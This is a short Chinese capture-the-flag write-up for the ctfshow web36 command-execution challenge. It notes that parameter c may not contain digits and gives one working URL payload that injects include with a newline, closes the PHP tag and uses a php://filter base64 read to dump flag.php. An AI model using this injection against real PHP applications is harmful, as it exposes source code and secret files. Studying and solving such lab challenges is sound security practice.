ctfshow-web36(命令执行)

 

这题c中不能出现数字,所以自己添加的参数不能是数字

?c=include%0a$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

你可能感兴趣的:(php,开发语言,后端)